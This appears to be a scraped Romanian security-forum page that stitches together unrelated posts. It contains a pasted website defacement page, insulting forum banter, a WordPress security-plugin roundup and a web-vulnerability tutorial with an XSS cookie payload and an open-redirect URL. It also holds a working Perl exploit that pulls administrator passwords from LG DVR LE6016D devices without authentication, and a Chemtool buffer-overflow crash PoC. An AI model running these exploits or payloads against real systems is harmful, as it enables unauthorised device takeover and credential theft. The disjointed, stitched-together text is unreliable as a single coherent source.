WordPress WP EasyCart Unrestricted File Upload WordPress Cross Slide 2.0.5 Cross Site Request Forgery / Cross Site Scripting WordPress Mobile Domain 1.5.2 Cross Site Request Forgery / Cross Site Scripting WordPress Spider Facebook 1.0.10 Cross Site Scripting WordPress Redirection Page 1.2 CSRF / XSS WordPress Google Doc Embedder 2.5.18 Cross Site Scripting WordPress Acobot Live Chat And Contact Form 2.0 CSRF / XSS WordPress Contact Form DB 2.8.26 Cross Site Scripting WordPress Cart66 Lite 1.5.4 Cross Site Scripting WordPress WPLMS 1.8.4.1 Privilege Escalation
-
<!-- Review note (defensive; page content kept verbatim): this is the defacement page as pasted in the post. Points a responder would record from it: every asset (favicon and banner images, the cursor file, the Google fonts and a 1x1 autoplaying YouTube iframe near the end) is loaded from third-party hosts; the analytics snippet still carries a Google Analytics account id and a _setDomainName value, and the page alone does not tell whether they come from the site's own template or from the attacker; the scripts use legacy APIs (document.all, eval, string-argument setTimeout, onselectstart/oncontextmenu hooks) to type out the messages and to suppress right-click and text selection. Line breaks inside the <script> blocks were restored, because the paste had collapsed them onto single lines, where the existing // comments swallow the statements that follow them. -->
<head><script type="text/javascript">var _gaq=_gaq||[];_gaq.push(['_setSiteSpeedSampleRate',100]);</script> <meta charset="utf-8"/> <TITLE>AlpShO A trecut Pe aici ! </TITLE> <br/> <META NAME="description" CONTENT="DJO'R"> <META NAME="keywords" CONTENT="djor"> <META NAME="robot" CONTENT="index,follow"> <META NAME="copyright" CONTENT="Copyright 2014"> <META NAME="author" CONTENT="no-c0de"> <META NAME="language" CONTENT="English"> <META NAME="revisit-after" CONTENT="1"> <link rel="SHORTCUT ICON" href="http://s2.postimg.org/w5btwer7d/defacedex.jpg"> <link href='http://fonts.googleapis.com/css?family=Averia+Sans+Libre' rel='stylesheet' type='text/css'> <link href='http://fonts.googleapis.com/css?family=Orbitron:700' rel='stylesheet' type='text/css'> <meta name="Description" content="HACKED by AlpShO "> <center> <style> body {cursor:cross; background: #000000 </style> <!-- the rule block above is left unclosed in the original --> <style>body{text-align;font-family:'Averia Sans Libre',cursive}hr{border:1px solid #1c1c1c}</style> <style type="text/css">body,td,th{color:#fff}body{cursor:url("http://www.fbvideo.16mb.com/files/cur.cur"),default;background-color:#000}a{text-decoration:none}a:link{color:#0f0}a:visited{color:#0f0}a:hover{color:#0f0}a:active{color:#0f0}.style2{Helvetica, sans-serif;font-weight:bold;font-size:15px}.style3{Helvetica, sans-serif;font-weight:bold}.style4{color:#ff0}.style5{color:red}.style6{color:#0f0}img{border:4px double red;box-shadow:0px 9px 15px white;border-radius:10px}.thanks{border:4px double #fff;box-shadow:0px 2px 20px white;border-radius:10px;padding:9px}.a{text-shadow:0px 1px 10px lime}</style> <meta name="google-site-verification" content=""/> <!-- standard async Google Analytics loader; the account id and domain name below are the values to note when attributing the template --> <script type="text/javascript">var _gaq=_gaq||[];_gaq.push(['_setAccount','UA-26650270-1']);_gaq.push(['_setDomainName','www.elite-entertainment.ch']);_gaq.push(['_trackPageview']);(function(){var 
ga=document.createElement('script');ga.type='text/javascript';ga.async=true;ga.src=('https:'==document.location.protocol?'https://ssl':'http://www')+'.google-analytics.com/ga.js';var s=document.getElementsByTagName('script')[0];s.parentNode.insertBefore(ga,s);})();</script> </head> <body> <center><img src="http://s14.postimg.org/9gogeq3t9/5m_Hbk_Go.jpg?noCache=1420998620" width="" height=""><br/><br/><p></p><font face="Orbitron" size="10" color="white" class="a">Deface by</font> <font face="Orbitron" size="10" color="#FF0000" class="a"> AlpShO</font><br> <span class="a"> WEBSITE: www.www.ro </span><br> <hr/> <span class="a"> <!-- second <body> tag, as in the original; its onload starts the typing effect --> <body onload="writetext()"> <script language="JavaScript">
/* Eight messages, indexes 0..7; each is an HTML fragment that gets typed into the #nothing div further down. */
msg = new Array();
msg[0] = "<center><font face='Courier' color='#00FF00' new size='4'><em>></em> <b>Securitatea ta e slaba!</b><br></font></center>";
msg[1] = "<center><font face='Courier' color='#00FF00' new size='4'><em>></em> <b>Hacked by AlpShO</b><br></font></center>";
msg[2] = "<center><font face='Courier' color='red' new size='4'><em>></em> <b>EXPECT US!</b><br></font></center>";
msg[3] = "<center><font face='Courier' color='red' new size='4'><em>></em> <b>Your base is on my control!</b><br></font></center>";
msg[4] = "<center><font face='Courier' color='red' new size='4'><em>></em> <b>Invatati 2 tutoriale si sunteti HACKERI !</b><br></font></center>";
msg[5] = "<center><font face='Courier' color='red' new size='4'><em>></em> <b> Faceti de rusine ROMANIA!</b><br></font></center>";
msg[6] = "<center><font face='Courier' color='red' new size='4'><em>></em> <b>Comunity is Down for AlpShO!</b><br></font></center>";
msg[7] = "<center><font face='Courier' color='red' new size='4'><em>></em> <b>Prea Multi Hackeri in lumea asta!</b><br></font></center>";
text1 = "___"; //the same as text2, only the last character is highlighted
text2 = ""; //current string, which will be written
count = 0; //char index in string text
count2 = 0; //number of strings
text = msg[0].split(""); //text - string written
/* Types the current message into #nothing one character at a time (25 ms per character, via a
   string-argument setTimeout), then moves to the next msg entry. The guard `count2 != 15` aims at
   15 strings, but only msg[0..7] exist, so eval('msg[8].split("")') throws a TypeError; that
   exception is what actually ends the loop after the eighth message. */
function writetext() { //show strings above on screen
text1 = text2 + "<font color='#FFFFFF'>" + text[count] + "</font>";
text2 += text[count];
document.all["nothing"].innerHTML = text1; //where to write
if (count < text.length-1){
count++;
setTimeout('writetext()', 25);
}
else { //if this string is written, get the new string
count = 0;
if (count2 != 15) { //write 15 strings
count2++;
text2 += ""; //a new line
text = eval('msg['+count2+'].split("")'); //get the new string to text
setTimeout('writetext()', 1);
}
}
}
</script> <script language="JavaScript">
<!-- Disable
/* Disables text selection and the context menu; the window.sidebar branch is for the
   browsers the original comment calls "NS6". */
function disableselect(e){
return false
}
function reEnable(){
return true
}
//if IE4+
document.onselectstart=new Function ("return false")
document.oncontextmenu=new Function ("return false")
//if NS6
if (window.sidebar){
document.onmousedown=disableselect
document.onclick=reEnable
}
//-->
</script> <div id="nothing" style="font-family: 'Courier';"> <h2><u> <center><br> <span style="color: rgb(204, 153, 51);"><br> </span></center> </u></h2> <p><b><br> <font color="#00ff00" face="Courier"> </font></b></p> </div> </center> </td> </tr> <tr> <center><i>+========== Forum-Couner Strike 1.6 ==========+</center></span><br> </div> </center> <center> </iframe></center> <center><i>+========== [ AlpShO ] ==========+</center></span><br> </div> </center> <!-- 1x1 iframe with autoplay=1&loop=1: plays audio on load, invisible to the visitor --> <center><iframe width="1" height="1" src="https://www.youtube.com/v/watch?v=DJ7ZL6ul71k&feature=related&autoplay=1&loop=1" frameborder="0" allowfullscreen></iframe></center> </body> </html><center><div style='border-top:1px solid #666666; height:20px; padding:1px; background: #333333 none repeat scroll 0% 0%; position: fixed; bottom: 0pt; right: 0pt; left: 0pt; width: 100%; z-index: 100; text-align: center; font-size:12pt;'><font size=1 style='color:gray;font-weight:bold;'><center>Copyright @ by <a href='http://wlg.ro/forum/' title='Cs Life Roamania Network™' style='color:gray'>AlpShO </a></font></div></center> <script language=Javascript>
<!--
var message="";
///////////////////////////////////
/* Right-click suppression. `(message)` is a bare expression statement, not an alert, and
   message is empty, so these handlers only cancel the default action via `return false`.
   The document.layers / document.all checks distinguish old Netscape from old IE. */
function clickIE() {if (document.all) {(message);return false;}}
function clickNS(e) {if (document.layers||(document.getElementById&&!document.all)) {
if (e.which==2||e.which==3) {(message);return false;}}}
if (document.layers)
{document.captureEvents(Event.MOUSEDOWN);document.onmousedown=clickNS;}
else{document.onmouseup=clickNS;document.oncontextmenu=clickIE;}
document.oncontextmenu=new Function("return false")
// -->
Ce e cu indexul asta de rahat, ce e cu copilaria aia Forum-Counter-Strike WTF? + indexul e luat din alte parti ) Tu esti hecar frate?
-
Nu inteleg ce rost are postul dar vezi ca am auzit toti de inspect element Daca vrei sa te bage cineva in seama fiindca te simti ca un nimic puteai sa zici ca te bagam! @NETGEAR pardon, scuze ca te-am jignit ai folosit paint, habar ai de inspect element! #Cu dedicatie pentru toti "fanii" mei care au grija sa ma sarute in locul ce nu iese soarele de fiecare data cand au sansa. Si inca un citat: "Uite, zbor peste târfe ?i p?rerile lor! " Versuri B.U.G. Mafia - Ti-o Dau La Muie
-
WordPress is the most popular blogging platform in the world. Millions of websites including various popular blogs are using WordPress as a content publishing platform. So, hackers are also more interested in hacking WordPress based websites. WordPress usually pushes updates to patch all the known vulnerabilities, but third party themes and plugins make WordPress vulnerable. Sometimes hackers also find vulnerabilities in WordPress that allow them to hack the whole server. In the past three months, we have seen 2 major zero-day vulnerabilities and mass hacking of WordPress websites. Thousands of websites were hacked by exploiting these vulnerabilities. There are many past examples in which a single vulnerable plugin led to the hacking of a whole web server hosting hundreds of websites. A few days back, we discussed SoakSoak malware which affected 100k websites in very little time by exploiting the vulnerability in a plugin. So, if you are a WordPress user, you must take care of security. You must always keep your WordPress installation updated and secure. In a previous post, I also discussed WPScanner, a tool for scanning a WordPress website and finding vulnerabilities in it. If you are a WordPress user, you can use this tool to find vulnerabilities in your website and patch them. In this post, I will discuss various security plugins available for WordPress. These security plugins offer a wide range of features to make your WordPress blog secure from known threats. These plugins keep their services updated with security from the latest exploits and threats. If you are really serious about your online business running on WordPress, you must use any of these plugins to make it secure. These are the 7 best security plugins available for WordPress. 1. WordFence WordFence is one of the most popular WordPress security plugins. It keeps on checking your website for malware infection. It scans all the files of your WordPress core, theme and plugins. 
If it finds any kind of infection, it will notify you. It claims to make your WordPress website 50 times faster and secure. For making your website faster, it uses Falcom caching engine. This plugin is free, but a few advanced features are available for premium users. If you can afford it, do it. This plugin blocks bruteforce attack and can add two factor authentication via SMS. You can also block traffic from a specific country. It also includes a firewall to block fake traffic, botnet and scanners. It also scans your hosting for known backdoors including C99, R57 and others. If it finds anything, you will instantly get email notification. It also scans your posts and comments for malicious code. It also supports multi-site. You can also check the traffic on your WordPress website in real time and see if there is any security threat attacking your website. Download WordFence 2. BulletProof Security BulletProof Security is another popular WordPress security plugin that takes care of various things. It adds firewall security, database security, login security and more. It comes with four-click setup interface. Just activate this plugin and then relax. It will take care of your website. It limits failed login attempts and blocks security scanners, fake traffic, IP blocking and code scanners. It keeps on checking the code of WordPress core files, themes and plugins. In case of any known infection, it notifies admin. It also optimizes the performance of your website by adding caching. It comes with built-in file manager for htaccess. It protects WordPress websites against various vulnerabilities including XSS, RFI, CRLF, CSRF, Base64, Code Injection, SQL Injection and many other. This plugin keeps itself updated with new vulnerabilities to keep your website protected. It keeps on updating it according to new exploits and vulnerabilities. It also has a pro version which offers some advanced features to improve the security of your website. 
But the free version is popular enough to make your website secure. Download BulletProof Security 3. Sucuri Security Sucuri Security is the security plugin for WordPress. This plugin is from the popular website security and auditing company Sucuri. This plugin offers various security features like security activity auditing, file integrity monitoring, malware scanning, blacklist monitoring, and website firewall. It incorporates various blacklist engines including Google Safe Browsing, Sucuri Labs, Norton, McAfee Site Advisor and more to check your website. If there is anything wrong, it will notify you via email. It protects your website from DOS attack, Zero Day Disclosure Patches, bruteforce attacks and other scanner attacks. It also keeps log of all activities and keep these logs safe in the Sucuri cloud. So, if an attacker is able to bypass the security controls, your security logs will be safe within Sucuri’s security operations center. If you are willing to pay, you can go for the Sucuri premium service. They are a well known web application security company with a team of experts. So, you can get better service and advice. Download Sucuri Security 4. iThemes Security (formerly Better WP Security) iThemes Security is also a nice WordPress security plugin which claims to offer 30+ ways to secure and protect your WordPress website. With one click installation, you can stop automated attacks and protect your website. it also fixes various common security holes in your website. It tracks registered users’ activity and adds two-factor authentication, import/export settings, password expiration, malware scanning, and various other things. It scans the entire website and tries to find if there is any potential vulnerability in your website. It also prevents bruteforce attacks and ban IP addresses which try to bruteforce. It also forces users to use secure passwords and also forces SSL for admin area in server support. 
Unlike other plugins, the GeoIP banning feature is not available. But the company has promised to bring this feature soon. We cannot say exactly when, but it says the feature is coming soon. It also integrates Google reCAPTCHA to prevent comment spam on your website. Download iThemes security 5. Acunetix WP SecurityScan Acunetix WP Security Scan is the WordPress security plugin by Acunetix. Acunetix is a well known company in web application security. It offers a security scanning tool to find vulnerabilities in web applications. This plugin helps you to secure your WordPress website and suggests measures to improve the security. It offers file permission security, version hiding, admin protection, removing WP generator tag from source, and database security. It removes various information from the source code of the page which can be used in the information gathering process before an attack. This includes theme update information, plugin update information, the Really Simple Discovery meta tag, WordPress version, the Windows Live Writer meta tag, error information from the login page, versions from scripts, versions from stylesheets, database and php error reporting. It also offers a database backup tool to take a backup of your website. With its live traffic monitor tool, you can check traffic in real time. It also scans your website to notify you of known web application vulnerabilities. Download Acunetix WP SecurityScan 6. All In One WP Security & Firewall All In One WP Security & Firewall is another popular WordPress security plugin to check vulnerabilities in your WordPress website. This plugin is easy to use and reduces the security risks by adding recommended security practices. It protects against bruteforce login attacks and locks down if someone tries to bruteforce. It also sends you an email notification if somebody gets locked out due to failed login attempts. It detects if a user tries to save a weak password and forces him/her to use a strong password. 
It also monitors the account activity of all users and keeps track of username, IP and login date time. It also allows you to schedule automatic backup and receive email notification. It also protects PHP code by disabling admin area editing. It adds a web application firewall in your website and enables 5G Blacklist to prevent various attacks. It denies bad query strings, prevents XSS, CSRF, SQL injection, malicious bots and other security threats. It also has a security scanner which keeps track of files and notifies you about each change in your WordPress system. It can also detect malicious code in your WordPress website. It blocks and protects your blog from comment spam. It also works with most plugins without any problem. Download All In One WP Security & Firewall 7. 6Scan Security 6Scan Security is a popular auto-fix protection for your WordPress site. It can protect your website from hackers. It offers rule-based protection for your website and tries to keep the security of your website up to date. It has a security scanner which scans and protects your website against SQL injection, Cross Site Scripting, CSRF, Directory traversal, Remote file inclusion, DoS attacks and other OWASP top ten security vulnerabilities. A notable feature of the plugin is its automatic vulnerability fix. When it finds any vulnerable code, it applies auto-fix by using its auto-fix server-side agent solution. It also has an automatic malware fix for malware related issues on your website. Like other plugins, it also sends email notifications if there is anything serious in your website. Download 6 Scan Security Additional security measures Along with these WordPress plugins, you should also follow a few security measures from your side. These will help you in improving the security of your blog. Always keep your WordPress installation up to date. Update your WordPress as soon as possible if there is any new WordPress update. 
Most of the time, hacked websites are those which are using an older version of WordPress. Older versions of WordPress always have a few known security issues. And exploits for these security issues are available for free. Even a kid can hack your website if it is running on a vulnerable version of WordPress. Always keep the plugins and themes added to your blog updated to the latest version. New versions always come with new features and security fixes. So, updating plugins and themes is necessary. Most of the time, these third party plugins and themes are the reason for vulnerability in WordPress websites. Attackers can exploit these plugins to gain access to your website or inject malicious script in your website. Download themes and plugins only from trusted sources. Nulled themes and themes from untrusted sources generally contain malware in the code. If you install any security plugin, you will be notified, but why take the risk? Avoid any unknown source for downloading plugins and themes. Avoid using the administrator username ‘admin’, because this is default and common. By using this username in your blog, you are making the attacker’s work easier. He does not need to guess the username now, just bruteforce your website for username admin. Thanks to these plugins, bruteforce will not work anymore. Always use a strong password for your WordPress account. WordPress bruteforcing tools are available. So, do not take the risk. Use a long password with capital letters, small case letters, numbers and special characters. A combination of these makes a strong password which is hard to guess. Conclusion These are few WordPress security plugins you can use to make your WordPress blog secure. You do not need to download all these plugins. Just try any one and see if it suits you. If you are not happy with its performance, you can download any other plugin to check and use. Every single plugin offers unique security features. 
You will feel relaxed after having any of these plugins in your website. Malware scanning, exploit scanning and brute force protection are few features which you must have in your website. If you have a good budget and do not want to be in technicalities, you can go for premium versions of the plugins which offer more advanced security features with detail reports. A few plugins also offer free customer support and security assessment with the pro version. With an increasing number of hacking attacks, it is necessary to have security in your website. If you are a WordPress user, what security plugin do you use in your website? Share it with us in the comments. Source
-
Introduction In this last part of the Website Hacking series, we are going to list 18 common web vulnerabilities and flaws and we are going to briefly provide solutions to them. Some of them are described for the first time in the Website Hacking series and some we have discussed before but in greater depth. 1. Saving all user input If you are using a framework, for example, a PHP framework, you might be tempted to save all user input to your model or database since it has already been validated and escaped. Let us say that you are using CakePHP and have included a registration form using CakePHP’s Form helper. SNIPPET 1 Now, you might be tempted to save all data from CakePHP’s $this->request->data array/method as is if you do not read the docs carefully or view some of the examples provided there (the live blog site). SNIPPET 2 You just save all data and thank the framework creators. However, there are at least two things you did wrong: $this->request->data does not contain escaped/sanitized input, just the input from the superglobals. Firstly, you should use CakePHP’s h() function to prevent people inserting tags in their username: like this h($this->request->data) However, this is not enough and a wrong approach. If you save all user input in your Model (database) the user can add new input tags directly in his browser and try to guess some columns in your users table for which you have not provided an input in the website’s form. For example, many CakePHP’s applications have “role” column set to user/admin or something similar (it is used in the docs as well). The user can just open his Developer Tools, find the registration form or right click and select Inspect Element, click on Edit as HTML and add a new input like this: <input name=”data[user][role]” type=”text”> <input name=” [user][role]” type=”text”> Or whatever the current way for forms to interact with your Models is, guess column names and insert values to them. 
One way to solve this is to change the name of the column that defines the user’s roles and permissions to something unpredictable. However, that is not the safest approach you can take. You can either insert the data into the database manually, which will ensure no extra columns will be saved: SNIPPET 3 Or alternatively, you could still save all user data but set explicitly the values of columns not found in the form: SNIPPET 4 2. Allowing user access to assets Many sites work with user input and user data and store this data. Clients can see where their assets are stored, so there is no need for them to guess. For example, a client could see that the images he uploaded were stored in /uploads/{username} because the images he uploaded were loaded to the page from that directory, so if he knows some usernames of different people he could just change the directory name to another user and browse through all of his data without having to brute-force directory names. The first way to tackle this issue that we discussed before is not enough (adding Options All -Indexes to the .htaccess file). It would prevent users from browsing directories and opening whatever they want but they would still know the directory exists and they can still guess directory names because the server will return a 403 Forbidden (which shows something exists in that path). Furthermore, they could guess file names from some patterns that the file names follow and open them. Therefore, you need to block access to the files in your uploads directory. If you are storing text files (let us say users can keep notes and view/edit them whenever they want) you could add to your .htaccess the following rule: RewriteEngine On RewriteRule ^uploads/.*.(txt|doc)$ - [F,L,NC] The F flag would return a 403 Forbidden response, the L flag causes the next rules to stop being processed, and the NC eliminates case-sensitivity. Figure 1: The page with only directory listing disabled. 
Figure 2: The page with only directory listing disabled. You cannot browse directories, but if each user has a notes.txt file, you can easily view user’s notes by knowing only their username. Figure 3: Trying to access the notes with both directory listing and controlled access to files. If you use the rewrite rule to disable users from browsing other users notes, your back-end would still be able to access the notes, show them to users or edit them. For example: SNIPPET 5 Where the $user variable would come from a session in a real-world application. 3. Running basic WordPress installation Common mistakes here are not limiting the login attempts on your wp-admin page. This would allow anyone to brute-force your credentials and destroy your blog/site. This becomes even easier because most people create their master username to be ‘admin’ which involves only brute-forcing the password to get full access to the WP website. Another mistake is that the wp-admin login page is left without a form of CAPTCHA or a protection against bots. This combined with no limitation of login attempts equals certain death of your online presence at some point in the future. You could avoid all 3 of these things and also change the default wp-admin path to be something different as well (obfuscation). 4. Relying too much on IP addresses while having weak bot protection Most ISPs provide dynamic IP addresses, and the IP address you have banned or stored may already be obsolete in less than a day. Furthermore, it is often not very difficult to change your IP address – use a proxy, release it from the router or from the OS, change locations. There are myriad ways to do it. To prevent bots from causing undesired consequences, it would be better to use alternative ways – enhance your CAPTCHAs, add inputs only bots will fill out, require JavaScript/cookies enabled to submit a form, and so on. 5. 
Improper redirects Let us say that you have a redirect page or a GET value (for simplicity’s sake) that redirects users to another page of your site or to another website. However, if you forget to disallow redirects to third-party websites or in case you allow those, if you do not create a warning page before redirecting that will tell the user where they are going and that they are leaving the site – users can easily abuse your site by giving links that seem to be pointing to your site but will redirect users to malicious websites. if (isset($_GET['redirect'])) { header("Location: " . $_GET['redirect']); } If we have something as simple as this, then users can easily get fooled to enter bad sites by following an URL like this: http://localhost:8079/articles/Website%20Hacking%20Part%20VII/?redirect=http://www.somemalicioussitehere.com 6. Cross Site Request Forgery If your site allows users to add comments/posts and insert tags such as <img> and load a third-party image, they can provide a link that is not an image but will fool the clients’ browsers (the users that will be reading them) to load the resource and perform an action on a website if they are authenticated in it. For example, if Facebook was sufficed with a couple of GET parameters or a particular URL to follow someone/something on their network, we could have added an image like that: my image And if the user is currently logged in he would have followed an arbitrary person. Of course, this would not work in this particular situation. 7. Insecure file handling A common mistake is to trust that a file does not contain something inappropriate. Code can be disguised as an image, so checking the file extension is not enough. At the very least, the MIME type should also be checked. Also, ASCII / text files should be escaped. 
Here is an example of such a vulnerability: SNIPPET 6 The vulnerability arises when at some point we display the contents of the .txt file in our page: SNIPPET 7 If the file we submit contains the following code: <script> alert(document.cookie); </script> Then all user cookies for that website will be shown in an alert. 8. Displaying and trusting HTTP headers These can be modified by users and can be malicious. For example, if you display the client’s User-Agent header, it might be changed to contain code which would then be executed in your back-end. This is also valid for the referrer header, so it should not be used by itself to determine whether the user can access a particular page (for example, checking if the referrer is the login page and assuming the user has logged in successfully since he was redirected to the members area’s index page from the login page). 9. Information disclosure Your live apps should not be in debug mode. Errors should not be shown. 10. Directory traversal If you are using some parameter that opens different files on your website based on user input, your back-end should escape special characters such as the . (dot) or / (slash) from the input and preferably use whitelisting. 11. Using HTTP for semi-confidential data A common flaw is using HTTP for sites that include mechanisms such as registration/login. Even widely used online marketplaces in Bulgaria use simple HTTP (such as OLX.bg - ???? ?? ????????? ????? ). Using HTTP makes it easy for potential attackers in your network to sniff your traffic and get your credentials with no real effort. For example, if you log in to olx while on a Wi-Fi network, you are subject to risk. 13. Sessions can be stolen Sessions can be stolen, letting the attacker log in as someone else. There are multiple vectors of defense here – such as checking the IP address and the user agent, regenerating the session, and adding cookies. 14. 
Be careful which third-party libraries, CDNs and plugins you use They might be simply outdated, opening a wide variety of security holes, or they might be malicious – giving the shady library’s creator access to your server. 15. Bots are everywhere Take care of malicious bots not by banning their IP but by enhancing CAPTCHA, adding hidden form fields that users would not fill, and requiring JavaScript or cookies enabled to submit a form. 16. Use HttpOnly cookies This would reduce the impact of some other attacks – such as XSS 17. Hashing Hash your passwords and try to avoid md5 or sha-1 algorithms (https://community.qualys.com/blogs/securitylabs/2014/09/09/sha1-deprecation-what-you-need-to-know, hash - Why does some popular software still use md5? - Information Security Stack Exchange ). Use salts to prevent attacks with rainbow tables. 18. XSS Always escape input unless you really, really trust the source (admin panel). You can either remove tags or display them as entities depending on your needs. | PHP: strip_tags($input, $allowedTags); htmlspecialchars($input, ENT_QUOTES); htmlentities($input); | 19. SQL Injection Use prepared statements or do not perform a query which is not hardcoded without sanitizing it (PHP: PDO class or sanitize with mysqli_real_escape_string($conn, $str) if using mysqli. Do not use mysql_*). Conclusion This was the last part of the Website Hacking series. We have introduced some new vulnerabilities and briefly discussed them and have summarized our points for everything that we have talked about so far. We hope that now you will feel more confident when deploying your web apps by putting these strategies in use. Source
-
------------------ ------------------- ||| Exploit-Sources(Part One) ||| ||| MINDZSEC ||| ||| Contact:flor_iano@hotmail.com ||| ||| ||| ------------------ ------------------- [Introduction] This paper is about the sources used to carry out hacking and about different exploits written by others. Here I have collected the most used sources to conduct a [Penetration Test][Hacking][Exploit Development][Forensics][Stack Smashing]. Here we go with the sources. Read more here: Exploit-Sources (Part One)
-
-
#!/usr/bin/perl
#
# LG DVR LE6016D unauthenticated remote
# users/passwords disclosure exploit
#
#
# Copyright 2015 (c) Todor Donev
# <todor.donev at gmail.com>
# http://www.ethical-hacker.org/
####
#
# Digital video recorder (DVR) surveillance is the use of cameras,
# often hidden or concealed, that use DVR technology to record
# video for playback or immediate viewing. As technological
# innovations have made improvements in the security and
# surveillance industry, DVR surveillance has become more
# prominent and allows for easier and more versatile security
# systems in homes and businesses. A DVR surveillance security
# system can be designed for indoor use or outdoor use and can
# often involve hidden security cameras, concealed “nanny cams”
# for home security, and even personal recording devices hidden
# on a person.
#
####
#
# Description:
# No authentication (login) is required to exploit this vulnerability.
# This program demonstrates how unpatched security bug would enable
# hackers to gain control of a vulnerable device while sitting
# behind their keyboard, potentially thousands of miles away.
# An unauthenticated attacker that is connected to the DVR's may be
# able to retrieve the device's administrator password allowing them
# to directly access the device's configuration control panel.
#
####
#
# Disclaimer:
# This or previous programs is for Educational purpose ONLY. Do not
# use it without permission.The usual disclaimer applies, especially
# the fact that Todor Donev is not liable for any damages caused by
# direct or indirect use of the information or functionality provided
# by these programs. The author or any Internet provider bears NO
# responsibility for content or misuse of these programs or any
# derivatives thereof. By using these programs you accept the fact
# that any damage (dataloss, system crash, system compromise, etc.)
# caused by the use of these programs is not Todor Donev's
# responsibility.
#
####
# Use them at your own risk!
####
#
# $ perl lg.pl 133.7.133.7:80
# LG DVR LE6016D unauthenticated remote
# users/passwords disclosure exploit
# u/p: admin/000000
# u/p: user1/000000
# u/p: user2/000000
# u/p: user3/000000
# u/p: LOGOUT/000000
# Copyright 2015 (c) Todor Donev
# <todor.donev at gmail.com>
# http://www.ethical-hacker.org/
#
####
#
# Review notes (defensive). The whole program is one unauthenticated HTTP GET
# to /dvr/wwwroot/user.cgi followed by printing every <name>/<pw> pair found in
# the response: the device serves its stored account list to anyone who can
# reach its web interface. The mitigations are network-side: keep the DVR's
# HTTP interface off untrusted networks (VPN or an authenticating reverse
# proxy), replace the factory-default passwords visible in the sample output,
# and alert on requests for that path from unexpected sources. The line breaks
# of the original file were restored here; the pasted copy had collapsed them.

use LWP::Simple;

print " LG DVR LE6016D unauthenticated remote\n users/passwords disclosure exploit\n";
# No argument: print usage and exit (&foot calls exit).
if (@ARGV == 0) {&usg; &foot;}
# Consumes every argument; only the last one is kept as target:port.
while (@ARGV > 0) { $t = shift(@ARGV); }
# LWP::Simple::get returns undef on any HTTP failure and does not set $!,
# so the die() message here will normally carry no detail.
my $r = get("http://$t/dvr/wwwroot/user.cgi") or die("Error $!");
# Fixed at five pairs (matching the sample output above). The /g regexes keep
# pos() on $r between iterations, so each pass advances to the next pair.
for (my $i=0; $i <= 4; $i++){
if ($r =~ m/<name>(.*)<\/name>/g){
print " u\/p: $1\/";
}
if ($r =~ m/<pw>(.*)<\/pw>/g){
print "$1\n";
}
}
&foot;
# Usage text; $0 is the script name.
sub usg(){
print "\n Usage: perl $0 <target:port>\n Example: perl $0 133.7.133.7:80\n\n";
}
# Footer; also the only exit path of the script.
sub foot(){
print " Copyright 2015 (c) Todor Donev\n <todor.donev at gmail.com>\n";
print " http://www.ethical-hacker.org/\n";
exit;
}
Source
Document Title: =============== Chemtool 1.6.14 Memory Corruption Vulnerability Date: ============= 08/02/2015 Vendor Homepage: ================ http://ruby.chemie.uni-freiburg.de/~martin/chemtool/ Abstract Advisory Information: ============================== Memory Corruption Vulnerability on Chemtool 1.6.14. Affected Product(s): ==================== Chemtool 1.6.14 or older Exploitation Technique: ======================= Local Severity Level: =============== Medium Technical Details & Description: ================================ A Memory Corruption Vulnerability is detected on Chemtool 1.6.14. An attacker can crash the software by using an input file. Also, an attacker can crash the software by entering a filename too long. b77a8000-b77a9000 r--s 00000000 08:01 152558 /var/cache/fontconfig/3fe29f0c9fa221c8ee16555d4835b3ab-le32d4.cache-4 b77a9000-b77aa000 r--s 00000000 00:15 209651 /run/user/1000/dconf/user b77aa000-b77bb000 r-xp 00000000 08:01 393480 /usr/lib/i386-linux-gnu/gtk-2.0/modules/liboverlay-scrollbar.so b77bb000-b77bc000 r--p 00010000 08:01 393480 /usr/lib/i386-linux-gnu/gtk-2.0/modules/liboverlay-scrollbar.so b77bc000-b77bd000 rw-p 00011000 08:01 393480 /usr/lib/i386-linux-gnu/gtk-2.0/modules/liboverlay-scrollbar.so b77bd000-b77be000 rwxp 00000000 00:00 0 b77be000-b77bf000 r--p 00855000 08:01 274691 /usr/lib/locale/locale-archive b77bf000-b77c0000 r--p 00596000 08:01 274691 /usr/lib/locale/locale-archive b77c0000-b77c2000 rw-p 00000000 00:00 0 b77c2000-b77c3000 r-xp 00000000 00:00 0 [vdso] b77c3000-b77e3000 r-xp 00000000 08:01 132074 /lib/i386-linux-gnu/ ld-2.19.so b77e3000-b77e4000 r--p 0001f000 08:01 132074 /lib/i386-linux-gnu/ ld-2.19.so b77e4000-b77e5000 rw-p 00020000 08:01 132074 /lib/i386-linux-gnu/ ld-2.19.so bfeff000-bff21000 rw-p 00000000 00:00 0 [stack] Aborted (core dumped) Proof of Concept (PoC): ======================= This vulnerabilities can be exploited by local attackers with userinteraction. First test. 
An attacker can generate a malicious file (with a .png extension); loading it triggers stack smashing. #/usr/bin/ruby buf = "a"*3000 filename = "crash.png" file = open(filename,'w') file.write(buf) file.close puts "file created!" Second test. An attacker can pass an over-long filename. The program takes a filename as its first argument; if that argument is too long, it crashes: $chemtool $(perl -e 'print "A"x900') How to perform: ======================= 1) Run the application under gdb (or attach gdb to it). 2) Open the "crash.png" file generated by the Ruby script in the application, or start it with a long argv[1]. Either step crashes the application; analyze the crash in gdb. Note that the "Aborted (core dumped)" output above is consistent with glibc's stack protector detecting the overflow and aborting the process, so the demonstrated impact is a crash (local denial of service), not code execution. Solution - Fix & Patch: ======================= Bound the copies of the input file contents and of argv[1] to the size of their destination buffers (explicit-length copies such as strncpy/snprintf). The author does not believe a fix is available; no vendor patch is referenced. Security Risk: ============== The security risk of the vulnerability is estimated as medium because the only demonstrated effect is a local crash. Authors: ================== Pablo González
https://rstforums.com/forum/96303-salu.rst E al 3-lea cont ( 2 sunt deja banate) On:// Bine ai venit! @YloveK vezi frate ca ai semnatura aia gigantica.. poti scrie mic ca vedem nu suntem orbi!
@Aerosol 1% ala am o relatie de 3 ani de zile (cu o fata) deci nu, nu imi plac fetele , si am vazut ca multi a postat conturi , eu nu pot posta ? Ha ha ha tocmai ai zis ca nu iti plac fetele ))) Stai linistit noi nu te judecam! Off:// Grea limba romana!
